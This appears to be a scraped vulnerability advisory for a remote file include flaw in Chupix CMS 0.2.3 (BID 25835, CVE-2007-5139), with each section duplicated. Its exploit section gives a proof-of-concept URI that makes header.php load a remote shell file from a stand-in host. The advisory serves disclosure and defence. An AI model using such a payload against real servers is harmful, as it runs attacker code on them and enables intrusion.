Chupix CMS Header.PHP Remote File Include
BID:25835
Info
Chupix CMS Header.PHP Remote File Include
| Bugtraq ID: | 25835 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5139 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 27 2007 12:00AM |
| Updated: | Apr 16 2015 06:08PM |
| Credit: | 0in is credited with the discovery of this vulnerability. |
| Vulnerable: |
Chupix CMS Chupix CMS 0.2.3 |
| Not Vulnerable: | |
Discussion
Chupix CMS Header.PHP Remote File Include
Chupix CMS is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process.
This issue affects Chupix CMS 0.2.3; other versions may also be vulnerable.
Chupix CMS is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process.
This issue affects Chupix CMS 0.2.3; other versions may also be vulnerable.
Exploit / POC
Chupix CMS Header.PHP Remote File Include
Attackers may exploit this issue through a browser.
The following proof-of-concept URI is available:
http://www.example.com/admin/include/header.php?repertoire=http://www.example2.com/shell.txt?
Attackers may exploit this issue through a browser.
The following proof-of-concept URI is available:
http://www.example.com/admin/include/header.php?repertoire=http://www.example2.com/shell.txt?
Solution / Fix
Chupix CMS Header.PHP Remote File Include
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].